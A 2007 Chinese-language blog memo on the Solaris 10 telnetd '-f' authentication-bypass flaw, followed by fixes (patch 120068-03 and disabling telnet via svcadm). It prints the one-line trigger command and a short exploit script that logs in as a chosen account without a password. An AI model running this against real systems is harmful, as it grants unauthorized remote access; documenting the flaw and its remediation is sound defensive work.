« HP Embedded SATA Raid 安装 RHEL AS 时的 adpahci 驱动问题 | Main | 安装Windows 2000 Server进行windowsupdate升级更新备忘 因笔记本硬盘被摔坏 »
February 12, 2007
Solaris 10 telnet漏洞及解决
|
版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本声明。 http://windtear.net/archives/2007/02/12/001201.html http://windtear.net/archives/2007/02/12/001201.html Solaris 10 telnet漏洞及解决 备忘一下 漏洞最早发现者 Kingcope http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf (另: 上次 SunOS login TTYPROMPT环境变量绕过验证漏洞发生在 2002年10月 http://marc.theaimsgroup.com/?l=bugtraq&m=103357889303304&w=2 http://marc.info/?l=bugtraq&m=103357889303304&w=2 ) 受影响的版本: Solaris 10及以后版本 触发方法: -l 后面跟 -fusername telnet -l"-fbin" 192.168.1.1 发现者提供的脚本如下: #!/bin/sh # CLASSIFIED CONFIDENTIAL SOURCE MATERIAL # # *********************ATTENTION******************************** # THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES # (C) COPYRIGHT Kingcope, 2007 # ################################################################ echo "" echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net" if [ $# -ne 2 ]; then echo "./sunos <host> <account>" echo "./sunos localhost bin" exit fi echo "" echo "ALEX ALEX" echo "" telnet -l"-f$2" $1 解决: 1. 打补丁 说明:Solaris 10的补丁,除了Security和hardware相关补丁可以免费下载,其它都是要服务支持的, 就是Sun Service Plan。但是对于知道Patch号的,可以从http://sunsolve.sun.com中单个下载。 这里可以在sunsolve上用PatchFinder查找120068-03补丁并下载,安装到系统中。 # showrev -p | grep 120068 Patch: 120068-01 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd Patch: 120068-03 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd 2. 可以禁止telnet方式登录 # svccfg list | grep telnet network/telnet # svcs -l network/telnet fmri svc:/network/telnet:default name Telnet server enabled true state online next_state none state_time Mon Feb 26 03:50:13 2007 restarter svc:/network/inetd:default 禁止telnet服务 # svcadm disable svc:/network/telnet:default SUN技术支持工程师Alan Hargreaves的相关blog: http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit |
Posted by windtear at February 12, 2007 10:58 PM
Trackback Pings
TrackBack URL for this entry:
http://cgi.windtear.net/cgi-bin/wt-tb.cgi/1201
Comments
Post a comment
【我爱网络】
2007-12-31 23:51 2007年度 ipcn.org/ipchina.org 总结报告
2007-12-31 00:31 vmware gsx server service
2007-12-31 00:15 squid 对 404 302 缓存的相关问题
2007-12-30 14:24 升级到 MovableType 3.3x 并修改 entry_basename 兼容性
2007-12-30 13:52 [php] realip judge 前面补0的ip格式剔除
2007-12-14 16:34 rm -rf * 系统管理员要排查的定时炸弹
2007-12-13 19:03 山西的宽带运营商太过分了 私自窜改dns解析
2007-12-13 16:35 F5 MIB 再学习 唯一性标记用地址的小bug
2007-12-11 22:15 perl 用Spreadsheet::WriteExcel写了个处理/读写excel的小程序
2007-12-11 13:39 perl 变量转义的问题
